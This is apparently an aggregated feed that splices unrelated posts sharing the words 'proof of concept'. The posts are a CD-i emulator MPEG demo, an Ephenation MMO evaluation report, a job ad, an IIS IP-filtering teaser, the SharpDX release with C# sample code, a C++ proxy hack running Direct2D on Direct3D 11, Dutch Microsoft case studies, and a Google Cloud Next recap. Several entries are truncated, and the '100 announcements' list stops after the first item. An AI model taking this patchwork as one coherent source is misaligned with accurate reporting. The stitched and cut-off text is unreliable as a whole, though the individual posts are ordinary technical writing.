Lucky Luke on YouTube        
I have just posted a "proof of concept" demonstration of CD-i Emulator MPEG decoding on YouTube:



The Philips Media bumper animation is MPEG (audio and video) and so is the audio for the piano sequence. The in-game crash is due to an MPEG sound effect.

This is with a Gate Array MPEG AH01 cartridge (22ER9141 F1 AH01); as the cartridge types get newer the decoding starts working lesser and lesser. Later GMPEG cartridges will crash earlier in the gameplay, VMPEG and IMPEG will not play MPEG at all. This is simply because I haven't gotten around to fixing those things yet; there are still major bugs in the buffering of the MPEG data and while that remains unfixed there is no point.

The magenta border indicates "beta" quality; it is not that hard to display the proper color (black in this case), but this will remind everyone that it is a work in progress.

Many other DVC titles will play their Philips bumper but crash soon thereafter; some others won't even get that far. In some cases this is not even due to MPEG decoding issues but to various "other" reasons for crashing (The 7th Guest is a notorious example).

I have also put up a new draft of the upcoming version 0.5.3-beta1 Release Notes on the website.
          Ephenation evaluation report        

Vision of Ephenation

To have a game like World Of Warcraft, where players are able to add their own adventures. I think this is a probable future development. This type of games should be fully realized and generally available in something like 10 to 20 years.

Goals

Unlimited world

The size of the world should not be limited. It is easier to implement a flat world than a spherical world, and a flat world can be unlimited. The nature will obviously have to be created automatically.

Unlimited players

This is not possible, of course, but the number of simultaneous players should be big. Limitation to 10 or 100 is much too small, as everyone would more or less know everyone and work on the same project. A minimum would be 1000 players, but preferably more than 10000. That will lead into a situation where you always meet new players you don't know, and the world is big enough so as to always find somewhere that you have not explored.

Unlimited levels

Most RPG type of games have a limited set of levels. But that will put a limit on the game play. After reaching the top level, the game is no longer the same. Not only that, but there is a kind of a race to reach this top level. Instead, there shall be no last top level. That will put an emphasis on constant exploration and progress.

Allocate territory

Players should be able to allocate a territory, where they can design their own adventures. This territory shall be protected from others, making sure no one else can interfere with the design.

Social support

The community and social interaction is very important. That is one reason for the requirement to support many players, as it will allow you to include all friends. There are a couple of ways to encourage community:
  1. Use of guilds. This would be a larger group of players, where you know the others.
  2. Temporary teams, used when exploring. It is more fun to explore with others.
  3. Use of common territories. It shall be possible to cooperate with friends to make territories that are related and possibly adjacent to each other.

Mechanics

It shall be possible to design interesting buildings, landscapes and adventures. The adventures shall be advanced enough so as to support triggered actions, with dynamic behavior that depends on player choices.

Execution

This is a description on how the project was executed. It was started end of 2010. Most of the programming was done by me (Lars Pensjö), but I got support with several sub modules.

Server

It was decided to use Go as the programming language for the server. Go has just the right support for this type of software:
  1. High performance (compiled language)
  2. Object oriented and static typing
  3. A concept of gorutines (light version of threads)
  4. A very high quotient for "it works when it compiles"
  5. Garbage collection
The disadvantage of Go when the Ephenation project was started, was that Go was a new language, in transition, with uncertain future. This turned out to not be a problem, and the language has today a frozen specification (Go 1).

To be able to manage the massive amount of players, quadtrees are used for both players and monsters.

It is the server that has full control over all Model data. Player attributes, melee mechanisms, movements, etc.

Client

The client was initially designed in C, but I soon switched to C++. There are still some remains from C, which explains some not-so-good OO solutions. OpenGL was selected, instead of DirectX, partly as a random choice, but also because I wanted to do the development in Linux.

It was decided to use OpenGL 3.3, instead of supporting older variants. There are some nice improvements in OpenGL that makes design easier, which was deemed more important than supporting old hardware.

The world consists of blocks, voxels. This is difficult to draw in real time with high FPS, as the number of faces grow very quickly with viewing distance. Considerable effort was spent on transforming the list of cubes into a list of visible triangles. It is also difficult to make a level of detail (LOD) algorithm that gradually reduce details on long distances.

Another technical difficult with a world based on cubes was to make it look nice, instead of blocky. Some algorithms were investigated that used a kind of filter. As the view distance is limited, there can be a conflict when being underground.

The game engine can't know whether the far distance, which is not visible, should be replaced by a light background (from the sky) or from a dark background (typical to being underground). A compromise is used, where the color of the distance fog depends on the player being at a certain height.

Protocol

There are strict requirements on the protocol. If a server shall be able to handle 10000+ players, the communication can easily become a bottleneck. TCP/IP was selected in favor of UDP/IP, to make it easier to handle traffic control. The protocol itself is not based on any standard, and completely customized for Ephenation.

Mechanics

There are two major choices. Either use a scripting language to control the aspects of the world, or a graphical approach. A scripting language is more powerful, but on the other hand it is harder to learn. There is also the problem with supporting a massive amount of players, in which case time consuming scripts would make it unfeasible.

The choice was to go for a limited set of blocks, with a special block type that can be used to initiate predefined actions. Inspiration was taken from the principles of Lego blocks. With a relatively small set of basic blocks, it is possible to construct the most amazing things.

Evaluation

Game engine

The client side was designed from scratch, instead of using an existing game engine. This may have been a mistake, as the main development time was spent on graphical technology, instead of exploring the basic visions.

Adventure design and mechanics

The set of blocks and possible actions with "activator blocks" are currently limited. It is not enough to construct full adventures that are fun to explore and provides great entertainment.
Early version of the game, where a player abused the monster spawner

Game play

The basic world is automatically generated. This usually make a game of limited interest, as game play is bound to become repetitive. Support from initial players enabled the creation of a world with many new buildings and creations. The more advanced features that support dynamic behavior was not added until later, which unfortunately lead to most part of the current world being too static.

Graphics

The graphics is working, but far from a production level. There are several glitches, e.g. camera falling inside the wall and lighting effects cut off. As the world is dynamic, the possibility to do offline precalculations are limited. That means most graphical effects has to be done live, which is a difficult requirement. For example, it is not known how many light sources that should be possible to manage. It was chosen to use a deferred shader, which improves the decoupling from geometry and shading.
Early attempt to create automatic monsters. This was later replaced with fully animated models.

Social

The social side of the game play has been explored very limited. There are ways to send message to nearby players, and to communicate privately with any player. Although this is a very important aspect of the final vision, it is known technology and not difficult to implement.

Performance tests

The aggressive requirement to support 10,000 simultaneous players is hard to verify. A simple simulator was used, adding 1000 players at random position with a uniform density. These players simply walked around. If they were attacked, they attacked back again. If they were killed, they automatically used the command to revive again.

On a Core I7 with 8 GBytes of RAM, the load from the server was approximately 10%. This is no proof that the server can actually manage 10,000 players, as there may be non linear dependencies. There are known bottlenecks, for example monster management that is currently handled by a single thread. That means at most one core can be used for this, but it should be possible to distribute this task into several smaller goroutines.

The communication was measured at around 100 MB/s. With linear scaling, it would be 1GB/s for 10,000 players. The intention is that the scaling should be linear, as cross communication between players is designed to be of constant volume. Still, it remains to be proven.

There is the obvious question whether the simulator is representative to real players. One way to improve that assessment would be to measure the actual behaviour of real players, and compare with the simulator.

Another possible bottle neck is the communication with the player database (MongoDB). This depends on the number of login/logout and auto saves. It also depends on load generated from the web page. This has not been evaluated. Typically, an access takes about 1ms. The MongoDB is currently located on the same system as the game server, minimizing communication latency. The database will have to be managed by another computer system for a full production server.

Equipment

The objects that the player can wear and wield are simplified. As the game as a concept is unlimited, it is not possible to hand craft objects. Instead, there are 4 defined qualities for each object, per level.

Communication

TCP/IP has a higher overhead than UDP/IP. Some packages are big (the complete chunks), which would have required several UDP/IP packets and a complicated transmission control. It may be that UDP/IP should be used instead. However, this was not an issue for evaluation of the project.

As the server is responsible for all object atributes, the clients need to be updated frequently. Player and monster positions are updated 10 times per second. This generates some data, so the update is limited to nearby players. Because of this, the client need to do interpolation to be able to show smooth movements, and the client need to be able to manage stale information about other players and monsters. The advantage of having the server manage all attributes is that it is not possible to cheat. The client source code is available, and it would have been easy to do changes.

Conclusion

Moore's law

I believe the computers will continue to grow more powerful exponentially for many years still. However, the full power will probably not be accessible unless the game server can scale well with increasing number of cores. The performance test were done on hardware from 2011, and there are already much more powerful equipment available.

Adventure design

As a proof of concept, I think the project was successful. The thing I miss most, is a powerful enough mechanism that supports custom adventures. This is a key point of the game concept, but I believe, with more personnel involved, that new ideas would be available that would improve the possibilities considerably.

Document update history

2013-02-22 First published.
2013-02-24 Added discussion about using voxels on the client side.
2013-02-27 Information about entity attribute management and communication.
2015-05-04 Pictures failed, and were replaced.

          Remote Pre-Sales Systems Engineer in Oklahoma City        
A growing technology company is searching for a person to fill their position for a Remote Pre-Sales Systems Engineer in Oklahoma City. Candidates will be responsible for the following: Using consultative selling to identify customer pain points associated with large virtual and cloud environments Leading technical presentations in person and assist sales directors with ROI presentations Addressing any and all pre-sales technical questions related to the full Proof of Concept (POC) cycle Qualifications for this position include: Willingness to travel to visit customers and our headquarters as necessary Extensive experience (5-7) years in virtualization (VCP-DCV) and cloud computing architectures 5-10 years in data center infrastructure or related field in a sales engineering or consulting capacity Strong affinity for customer relationship management and requirements gathering Highly motivated, passionate team player, driven to thrive in an entrepreneurial, high activity environment All other requirements listed by the company
          Remote IP Filtering        
In the following post I would like to demonstrate how to enforce ip address filtering for a web role using a simple security settings provided by the IIS web server. The goal of this post is just a proof of concept and should only be taken as a base for future work. For our discussion let’s consider that during production […]
          SharpDX, a new managed .Net DirectX API available        
If you have followed my previous work on a new .NET API for Direct3D 11,  I proposed SlimDX team this solution for the v2 of their framework, joined their team around one month ago, and I was actively working to widen the coverage of the DirectX API. I have been able to extend the API coverage almost up to the whole API, being able to develop Direct2D samples, as well as XAudio2 and XAPO samples using it. But due to some incompatible directions that the SlimDX team wanted to follow, I have decided to release also my work under a separate project called SharpDX. Now, you may wonder why I'm releasing this new API under a separate project from SlimDX?

Well, I have been working really hard on this from the beginning of September, and I explained why in my previous post about Direct3D 11. I have checked-in lots of code under the v2 branch on SlimDX, while having lots of discussion with the team (mostly Josh which is mostly responsible for v2) on their devel mailing list. The reason I'm leaving SlimDX team is that It was in fact not clear for me that I was not enrolled as part of the decision for the v2 directions, although  I was bringing a whole solution (by "whole", I mean a large proof of concept, not something robust, finished). At some point, Josh told me that Promit, Mike and himself, co-founders of SlimDX, were the technical leaders of this project and they would have the last word on the direction as well as for decisions on the v2 API.

Unfortunately, I was not expecting to work in such terms with them, considering that I had already made 100% of the whole engineering prototype for the next API. From the last few days, we had lots of -small- technical discussions, but for some of them, I clearly didn't agree about the decisions that were taken, whatever the arguments I was trying to give to them. This is a bit of disappointment for me, but well, that's life of open source projects. This is their project and they have other plans for it. So, I have decided to release the project on my own with SharpDX although you will see that the code is also currently exactly the same on the v2 branch of SlimDX (of course, because until yesterday, I was working on the SlimDX v2 branch).

But things are going to change for both projects : SlimDX is taking the robust way (for which I agree) but with some decisions that I don't agree (in terms of implementation and direction). Although, as It may sound weird, SharpDX is not intended to compete with SlimDX v2 : They have clearly a different scope (supporting for example Direct3D 9, which I don't really care in fact), different target and also different view on exposing the API and a large existing community already on SlimDX. So SharpDX is primarily  intended for my own work on demomaking. Nothing more. I'm releasing it, because SlimDX v2 is not going to be available soon, even for an alpha version. On my side, I'm considering that the current state (although far to be as clean as It should be) of the SharpDX API is usable and I'm going to use it on my own, while improving the generator and parser, to make the code safer and more robust.

So, I did lots of work to bring new API into this system, including :
  • Direct3D 10
  • Direct3D 10.1
  • Direct3D 11
  • Direct2D 1
  • DirectWrite
  • DXGI
  • DXGI 1.1
  • D3DCompiler
  • DirectSound
  • XAudio2
  • XAPO
And I have been working also on some nice samples, for example using Direct2D and Direct3D 10, including the usage of the tessellate Direct2D API, in order to see how well It works compared to the gluTessellation methods that are most commonly used. You will find that the code is extremely simple in SharpDX to do such a thing :
using System;
using System.Drawing;
using SharpDX.Direct2D1;
using SharpDX.Samples;

namespace TessellateApp
{
///
/// Direct2D1 Tessellate Demo.
///

public class Program : Direct2D1DemoApp, TessellationSink
{
EllipseGeometry Ellipse { get; set; }
PathGeometry TesselatedGeometry{ get; set; }
GeometrySink GeometrySink { get; set; }

protected override void Initialize(DemoConfiguration demoConfiguration)
{
base.Initialize(demoConfiguration);

// Create an ellipse
Ellipse = new EllipseGeometry(Factory2D,
new Ellipse(new PointF(demoConfiguration.Width/2, demoConfiguration.Height/2), demoConfiguration.Width/2 - 100,
demoConfiguration.Height/2 - 100));

// Populate a PathGeometry from Ellipse tessellation
TesselatedGeometry = new PathGeometry(Factory2D);
GeometrySink = TesselatedGeometry.Open();
// Force RoundLineJoin otherwise the tesselated looks buggy at line joins
GeometrySink.SetSegmentFlags(PathSegment.ForceRoundLineJoin);

// Tesselate the ellipse to our TessellationSink
Ellipse.Tessellate(1, this);

// Close the GeometrySink
GeometrySink.Close();
}


protected override void Draw(DemoTime time)
{
base.Draw(time);

// Draw the TextLayout
RenderTarget2D.DrawGeometry(TesselatedGeometry, SceneColorBrush, 1, null);
}

void TessellationSink.AddTriangles(Triangle[] triangles)
{
// Add Tessellated triangles to the opened GeometrySink
foreach (var triangle in triangles)
{
GeometrySink.BeginFigure(triangle.Point1, FigureBegin.Filled);
GeometrySink.AddLine(triangle.Point2);
GeometrySink.AddLine(triangle.Point3);
GeometrySink.EndFigure(FigureEnd.Closed);
}
}

void TessellationSink.Close()
{
}

[STAThread]
static void Main(string[] args)
{
Program program = new Program();
program.Run(new DemoConfiguration("SharpDX Direct2D1 Tessellate Demo"));
}
}
}

This simple example is producing the following ouput :


which is pretty cool, considering the amount of code (although the Direct3D 10 and D2D initialization part would give a larger code), I found this to be much simpler than the gluTessellation API.

You will find also some other samples, like the XAudio2 ones, generating a synthesized sound with the usage of the reverb, and even some custom XAPO sound processors!

You can grab those samples on SharpDX code repository (there is a SharpDXBinAndSamples.zip with a working solutions with all the samples I have been developing so far, with also MiniTris sample from SlimDX).
          Hacking Direct2D to use directly Direct3D 11 instead of Direct3D 10.1 API        
Disclaimer about this hack: This hack was nothing more than a proof of concept and I *really* don't have time to dig into any kind of bugs related to it.

[Edit]13 Jan 2011, After Windows Update KB2454826, this hack was not working. I have patched the sample to make it work again. Of course, you shouldn't consider this hack for anykind of production use. Use the standard DXGI shared sync keyed mutex instead. This hack is just for fun![/Edit]


If you know Direct3D 11 and Direct 2D - they were released almost at the same time - you already know that there is a huge drawback to use Direct 2D : It's in fact only working with Direct3D 10.1 API (although It's working with older hardware thanks to the new feature level capability of the API).

From a coding user point of view, this is really disappointing that such a good API doesn't rely on the latest Direct3D API... moreover when you know that the Direct3D 11 API is really close to the Direct3D 10.1 API... In the end, more work are required for a developer that would like to work with Direct3D 11, as It doesn't have any more Text API for example, meaning that in D3D11, you have to do it yourself, which isn't a huge task itself, if you go to the easy precalculated-texture-of-fonts generated by some GDI+ calls or whatever, but still... this is annoying specially when you need to display some information/FPS on the screen and you can't wait to build a nice font-texture-based system...

I'm not completely fair with Direct2D interoperability with Direct3D 11 : there is in fact a well known solution proposed by one guy from DirectX Team that imply the use of DXGI mutex to synchronized a surface shared between D3D10.1 and D3D11. I was expecting this issue to be solved in some DirectX SDK release this year, but It seems that there is no plan to release in the near future an update for Direct2D (see my question in the comments and the anwser...)... WP7 and XNA are probably getting much more attention here...

So last week, I took some time on the Direct2D API and found that It's in fact fairly easy to hack Direct2D and redirect all the D3D10.1 API calls to a real Direct3D 11 instance... and this is a pretty cool news! Here is the story of this little hack...


How Direct2D is accessing your already instantiated D3D10.1 device?


In order to use Direct2D with a renderable D3D10 texture2D, you need to query the IDXGISurface from your ID3D10Texture2D object, something like this:
IDXGISurface* surface;

// Create a Texture2D (or use SwapChain backbuffer)
d3d10Device->CreateTexture2D(&texture2DDesc, 0, &texture2D);

// Query the DXGI Surface associated with the D3D10.1 Texture2D
texture2D->QueryInterface(__uuidof(IDXGISurface), &surface);

// Create a D2D Render target from the D3D10 Texture2D through the associated DXGISurface
d2dFactory->CreateDxgiSurfaceRenderTarget(
surface,
&props,
&d2dRenderTarget
);
So starting from this CreateDxgiSurfaceRenderTarget call, Direct2D is somehow able to get back your D3D10.1 instance and is able to use it to submit drawcalls / create textures... etc. In order to find how Direct2D is getting an instance of ID3D10Device1, I have first implemented a Proxy IDXGISurface that was responsible to embed the real DXGI Surface and delegate all the calls for it...while being able to track down how Direct2D is getting back this ID3D10Device1 :

  • After the surface enters the CreateDxgiSurfaceRenderTarget, Direct2D is querying the IDXGIDevice through the GetDevice method on the IDXGISurface
  • From the IDXGIDevice, Direct2D is calling QueryInterface with the IID of the ID3D10Device interface (surprisingly not the ID3D10Device1)
And bingo! Being able to give your own implementation of the ID3D10Device to Direct2D... and you are able to redirect all the D3D10 calls to a Direct3D 11 device/context with a simple proxy implementing ID3D10Device1 methods!

Interoperability between D3D10.1 and D3D11 API


Migrating from D3D10/D3D10.1 to D3D11 API is quite straightforward and even have a dedicated paper on msdn. For the purpose of this quick hack, I didn't implement proxies for the whole D3D10 API... but I have instead focused my work on how is used the D3D10 API from D2D and what are the real methods/structures used that are not binary compatible between D3D10 and D3D11.

In the end, I have developped 5 proxies :
  • a Proxy for IDXGISurface interface, in order to hack the GetDevice method and return my own proxy for IDXGIDevice
  • a Proxy for IDXGIDevice interface in order to hack the QueryInterface method and return my own proxy for ID3D10Device1
  • a Proxy for the ID3D10Device1 interface
  • a Proxy for the ID3D10Texture2D interface
  • a Proxy for the ID3D10Buffer interface
For the ID3D10Device1 interface, most of the methods are redirecting  the calls directly to the device (ID3D11Device) or context (ID3D11DeviceContext). I didn't bother to implement proxies for most of the parameters, because even if they are not always binary compatible, returned objects are only used as reference and are not called directly. Suppose for example the proxy implementation for VSGetShader (which is used by Direct2D for saving the D3D10 pipeline state) :
virtual void STDMETHODCALLTYPE VSGetShader( 
/* [annotation] */
__out ID3D10VertexShader **ppVertexShader) {
context->VSGetShader((ID3D11VertexShader**)ppVertexShader, 0, 0);
}

A Real proxy would have to wrap the ID3D11VertexShader inside a ID3D10VertexShader proxy... but because Direct2D (and this is not a surprise) is only using VSGetShader to later call VSSetShader (in order to restore the saved states, or to set it's own vertex/pixel shaders), It doesn't call any method on the ID3D10VertexShader instance... meaning that we can give it back directly a ID3D11VertexShader without performing any - costly - conversion.

For instance, most of the ID3D10Device1 proxy methods are like the previous one, a simple redirection to a D3D11 Device or DeviceContext... easy!

I was only forced to implement custom proxies for some incompatible structures... or returned object instance that are effectively used by Direct2D (like ID3D10Buffer and ID3D10Texture2D).

For example, the ID3D10Device::CreateBuffer proxy methods is implemented like this :

virtual HRESULT STDMETHODCALLTYPE CreateBuffer( 
/* [annotation] */
__in const D3D10_BUFFER_DESC *pDesc,
/* [annotation] */
__in_opt const D3D10_SUBRESOURCE_DATA *pInitialData,
/* [annotation] */
__out_opt ID3D10Buffer **ppBuffer) {
D3D11_BUFFER_DESC desc11;

*((D3D10_BUFFER_DESC*)&desc11) = *pDesc;
// StructureByteStride field is new in D3D11
desc11.StructureByteStride = 0;

// Returns our ID3D10Buffer proxy instead of the real one
ProxyID3D10Buffer* buffer = new ProxyID3D10Buffer();
buffer->device = this;
*ppBuffer = buffer;
HRESULT result = device()->CreateBuffer(&desc11, (D3D11_SUBRESOURCE_DATA*)pInitialData, (ID3D11Buffer**)&buffer->backend);

CHECK_RETURN(result);

// return S_OK;
}

There was also just a few problems with 2 incompatible structures between D3D10_VIEWPORT/D3D11_VIEWPORT (D3D11 is using floats instead of ints!) and D3D10_BLEND_DESC/D3D11_BLEND_DESC... but the proxy methods were easy to implement:

virtual void STDMETHODCALLTYPE RSSetViewports( 
/* [annotation] */
__in_range(0, D3D10_VIEWPORT_AND_SCISSORRECT_OBJECT_COUNT_PER_PIPELINE) UINT NumViewports,
/* [annotation] */
__in_ecount_opt(NumViewports) const D3D10_VIEWPORT *pViewports) {

// Perform conversion between D3D10_VIEWPORT and D3D11_VIEWPORT
D3D11_VIEWPORT viewports[16];
for(int i = 0; i < NumViewports; i++) {
viewports[i].TopLeftX = pViewports[i].TopLeftX;
viewports[i].TopLeftY = pViewports[i].TopLeftY;
viewports[i].Width = pViewports[i].Width;
viewports[i].Height = pViewports[i].Height;
viewports[i].MinDepth = pViewports[i].MinDepth;
viewports[i].MaxDepth = pViewports[i].MaxDepth;
}
context->RSSetViewports(NumViewports, (D3D11_VIEWPORT*)viewports);
}

Even if I haven't performed any performance timing measurement, the cost of those proxy methods should be almost unnoticeable... and probably much more lightweight than using mutex synchronization between D3D10 and D3D11 devices!

Plug-in the proxies


In the end, I have managed to put those proxies in a single .h/.cpp with an easy API to plug the proxy. The sequence call before passing the DXGISurface to Direct2D should then be like this:

d3d11Device->CreateTexture2D(&offlineTextureDesc, 0, &texture2D);

// Create a Proxy DXGISurface from Texture2D compatible with Direct2D
IDXGISurface* surface = Code4kCreateD3D10CompatibleSurface(d3d11Device, d3d11DeviceContext, texture2D);

d2dFactory->CreateDxgiSurfaceRenderTarget(
surface,
&props,
&d2dRenderTarget
);

And that's all! You will find attached a project with the sources. Feel free to test it and let me know if you are encountering any issues with it. Also, the code is far from being 100% safe/robust... It's a quick hack. For example, I have not checked carefully that my proxies behaves well with AddRef/Release... but that should be fine.

So far, It's seems to work well on the whole Direct2D API... I have even been able to use DirectWrite with Direct2D... using Direct3D 11, without any problem. There is only one issue : PIX won't be able to debug Direct2D over Direct3D 11... because It seems that Direct2D is performing some additional method calls (D3D10CreateStateBlocks) that are incompatible with the lightweight proxies I have developed... In order to be fully supported, It would be necessary to implement all the proxies for all the interfaces returned by ID3D10Device1... But this is a sooo laborious task that by that time, we can expect to have Direct2D fully working with Direct3D 11 provided from DirectX Team itself!

Also from this little experience, I can safely confirm that It shouldn't take more than one day for one guy from the Direct2D team to patch existing Direct2D code in order to use Direct3D 11... as it is much easier to do this on the original code than going to the proxy road as I did! ;)



You can grab the VC++ 2010 project from here : D2D1ToD3D11.7z

This sample is only saving a "test.png" image using Direct2D API over Direct3D11.
          Dynamics CRM en SharePoint Server stellen de Huurcommissie in staat haar processen te optimaliseren         
De Huurcommissie geeft algemene informatie over huurprijswetgeving en huurprijsprocedures en doet uitspraak wanneer huurder en verhuurder er samen niet uitkomen. Voor de afhandeling van geschillen tussen huurder en verhuurder staat een wettelijke termijn. Echter, de Huurcommissie had moeite om binnen die termijn een uitspraak te doen. Dirk Goet, senior adviseur ICT bij de Huurcommissie, legt uit waarom. "De Huurcommissie heeft relatief veel medewerkers, die verspreid over het hele land vanuit huis werken. Al deze medewerkers werken vanuit huis en moeten voor hun werk geregeld dossiers raadplegen. Dat waren papieren dossiers, dus die moesten we via koeriers laten thuisbezorgen en weer laten ophalen. Al met al ging daar veel tijd mee verloren. Door de papieren dossiers kostte de afhandeling van een geschil gemiddeld zeven tot acht maanden. Dat wilden we met een geschikt automatiseringssysteem terugbrengen naar vier tot vijf maanden.”   De Huurcommissie maakte tot voor kort deel uit van het ministerie van Volkshuisvesting. In 2010 werd de Huurcommissie zelfstandig, en werd een IT-project gestart met als doel het opzetten van een nieuwe infrastructuur en een nieuw primair systeem. Dirk Goet: "De Huurcommissie wilde een omvangrijke digitaliseringsslag maken: digitalisering van de dossierafhandeling, een oplossing die altijd beschikbaar is, zowel tijd- als plaatsonafhankelijk. Daarvoor is een gedegen IT-infrastructuur vereist, waaraan wij qua performance, beschikbaarheid, bandbreedte en beveiliging hoge eisen moeten kunnen stellen.”   OPLOSSING   De Huurcommissie heeft de producten van meerdere leveranciers naast elkaar gelegd, waaronder SAP, Oracle en Microsoft. Dat deed de Huurcommissie met een Proof of Concept (POC). Een van de deelnemende partijen was het Amersfoortse bedrijf QS Solutions . Leo Rietbergen van QS Solutions: “Ons voorstel was een oplossing op basis van Microsoft Dynamics CRM 4.0 en SharePoint Server 2007."
          DBV Verzekeringen bouwt SOA-implementatie met ontwikkelstraat op basis van Microsoft .NET FrameWork 3.5        
DBV Verzekeringen opereert als zelfstandig verzekeraar en onder eigen naam binnen de SNS REAAL groep en is gespecialiseerd in flexibele levensverzekeringen en hypotheken. Het verzekeringsbedrijf heeft bij wijze van proof of concept een bestaand bedrijfsproces opnieuw ingericht in een SOA-architectuur, compleet met workflowondersteuning. Daarbij werd gebruik gemaakt van een ontwikkelstraat. Deze is gebaseerd op het Microsoft-applicatieplatform. Dat gaf niet alleen meer inzicht in het ontwikkeltraject, deze aanpak leidde bovendien tot een hogere productiviteit én kwaliteit. Het project toonde met succes aan dat een SOA-oplossing voor de automatisering van de bedrijfsprocessen op basis van Microsoft technologie goed aansluit bij de wensen en eisen van de klant. André Ruiter, ICT Architect van DBV Verzekeringen: “De proef heeft aangetoond dat verschillende systemen binnen een proces gekoppeld kunnen worden, ongeacht in welke technologie ze zijn ontwikkeld en wat hun fysieke locatie is. Ook het ontwikkelen en beschikbaar stellen van services wordt eenvoudiger, omdat de relaties met andere systemen duidelijk zijn afgebakend.”   Voor alle projectmedewerkers en stakeholders is de status van het project te allen tijde inzichtelijk. André Ruiter: “De grootste meerwaarde van het inzetten van Visual Studio Team System is dat er meer inzicht is in het ontwikkelprocess. Daardoor krijg je meer grip op het project en dat komt de productiviteit ten goede. Ook de service templates van Visual Studio hebben bijgedragen aan de productiviteit, want die werken probleemloos en hebben ons veel tijd bespaard.” Gevraagd om de voordelen van de ontwikkelstraat in een getal uit te drukken antwoordt de IT Architect: “De hogere productiviteit in je ontwikkelstraat betekent een korte time to market voor nieuwe ontwikkelingen die je wilt uitrollen. We verwachten een efficiëntieverbetering te bereiken van ongeveer 30%."
          NVIDIA working on Linux support for Optimus automatic graphics switching        

NVIDIA working on Linux support for Optimus automatic graphics switching

Linux godfather Linus Torvalds may have a frosty relationship with NVIDIA, but that hasn't stopped the company from improving its hardware's support for the open-source operating system. In fact, the chipset-maker is working on the OS' compatibility with its Optimus graphics switching tech, which would enable laptops to conserve power by swapping between discrete and integrated graphics on the fly. In an email sent to a developer listserv, NVIDIA software engineer Aaron Plattner revealed that he's created a working proof of concept with a driver. There's no word on when the Tux-loving masses may see Optimus support, but we imagine that day can't come soon enough for those who want better battery life while gaming on their mobile machines.

Via: PC World

Source: Gmane


          Multiweight script families - Help with PhD        

Hello everyone,
I am currently writing a dissertation on type technology, focused on developing a workflow for creating multiweight script/cursive families utilizing Multiple Master technology and some Metafont/Metapost techniques. To be more precise my objective is help the designer in creating calligraphy and brush scripts – of the kind which weight cannot be just changed without complete redrawing (you can’t just move stems around).

The basic concept is to allow the artist to draw his characters in whatever software product he chooses, when he/she is satisfied with the result, he imports the centerlines in whatever font production software, activates the script, enters brush parameters and receives two masters with clean outlines minimum number of points and PS drawing standards compliant and etc. It sounds simple and it actually is – as I have managed to create a working model written in Python (proof of concept) and I am currently using it for font development.

So you all know having working model does not complete a dissertation. As I am currently writing the first chapter of my monograph I am struggling with the following problem: I cannot seem to find any other authors that worked on the same subject – mutiweight script/cursive families. I know that there must be at least couple of authors that have addressed the problem in the past. So could you please point me to some articles or books concerning the subject?

Thank you in advance!
Vassil


          VMware: VM stats using PowerCLI and Google Charts        
Let me start today's post by pointing out that this is more a proof of concept than a real thing, but I hope from this piece of code you get the idea of how many different tasks can be accomplished by using PowerCLI and how versatile it is for reporting capabilities. After producing fancy reports using PowerCLI why not also include some charts in them?

This can be easily accomplished by using Google Charts, JavaScript pieces of code that generates charts/tables just by passing data to them and the resulting charts can be embedded in web pages.

The idea behind this PowerCLI script is to generate an HTML page and retrieve stats from an entity (a virtual machine) by using the Get-Stat cmdlet. These stats will be passed as data upon which charts will be created.

If you have a look at a sample chart code, for example a donut chart, you can slice it up into three different areas: an header in which javascript function is defined, a body, the most important part, in which you insert all the data and some options like title, measures to be used on x-y-axis, etc. Third and final part is a sort of a footer in which javascript and html tags are closed.

The PowerCLI cmdlet Get-Stat retrieve stats from any powered on virtual machine:

 Get-Stat -Entity (Get-VMHost -Name 10.0.1.62 | Get-VM | Where-Object PowerState -match "PoweredOn") -Stat $stat -Start (Get-Date).AddHours(-24) -MaxSamples (10) -IntervalMins 10 | Measure-Object Value -Average  

Where:

-Entity: the object against you want to retrieve stats from. This could be a datacenter, a virtual machine, a host, etc. In the line above it retrieves all powered on VMs running on host 10.0.1.62.
-Stat: the statistic you want to retrieve.

The following values are accepted:

cpu.usage.average
cpu.usagemhz.average
mem.usage.average
disk.usage.average
net.usage.average
sys.uptime.latest

-Start: start time of statistics retrieval
-MaxSamples: how many samples consider for the measurement
-IntervalMins: the amount of time that separates two consecutive measurements
-Measure-Object Value: we need to specify we are going to use this value as a measure.
-Average: how this measure will be considered. Average, Maximum and Minimum are accepted values. Average consider the average resulting value from all collected samples. Please note that for every of the available stats the Average value is a good indicator since the average usage of CPU, Memory, Disk or Network over an amount of time could be considered as a good indicator of how well the measured entity performs. sys.uptime.latest is the only measure for that average is not suited, since we need to retrieve only the last value of uptime in this case Maximum is the correct way to measure it.

The output produced by the PowerCLI script is an HTML file and this means that you can style it applying a proper CSS.

This is an example of a chart report I generated:



The following is the sample PowerCLI code used to generate a donut chart, as usual you can find it also on my GitHub repository: Stats using Google charts.ps1



As you can see this time HTML page is generated by simply concatenating variables $htmlheader, $data and $htmlfooter containing the HTML code. This is another, less elegant way though, to generate the HTML page. Conversely you can use the ConvertTo-Html cmdlet as in fancy reports using PowerCLI.
          Enabled-First-in-Human™ – Accelerating Your Programs into Clinic and Through to Proof of Concept (PoC), New Webinar Hosted by Xtalks        

This webinar will describe the Translational Pharmaceutics™ platform and present Enabled-First-in-Human case studies to illustrate how it has been applied in early stage drug development programs. There will be two live broadcasts on Wednesday July 9, 2014, at 9am EDT/2pm BST, and at 12pm EDT/5pm BST.

(PRWeb June 25, 2014)

Read the full story at http://www.prweb.com/releases/2014/06/prweb11966812.htm


          100 announcements (!) from Google Cloud Next '17        

San Francisco — What a week! Google Cloud Next ‘17 has come to the end, but really, it’s just the beginning. We welcomed 10,000+ attendees including customers, partners, developers, IT leaders, engineers, press, analysts, cloud enthusiasts (and skeptics). Together we engaged in 3 days of keynotes, 200+ sessions, and 4 invitation-only summits. Hard to believe this was our first show as all of Google Cloud with GCP, G Suite, Chrome, Maps and Education. Thank you to all who were here with us in San Francisco this week, and we hope to see you next year.

If you’re a fan of video highlights, we’ve got you covered. Check out our Day 1 keynote (in less than 4 minutes) and Day 2 keynote (in under 5!).

One of the common refrains from customers and partners throughout the conference was “Wow, you’ve been busy. I can’t believe how many announcements you’ve had at Next!” So we decided to count all the announcements from across Google Cloud and in fact we had 100 (!) announcements this week.

For the list lovers amongst you, we’ve compiled a handy-dandy run-down of our announcements from the past few days:

100-announcements-15

Google Cloud is excited to welcome two new acquisitions to the Google Cloud family this week, Kaggle and AppBridge.

1. Kaggle - Kaggle is one of the world's largest communities of data scientists and machine learning enthusiasts. Kaggle and Google Cloud will continue to support machine learning training and deployment services in addition to offering the community the ability to store and query large datasets.

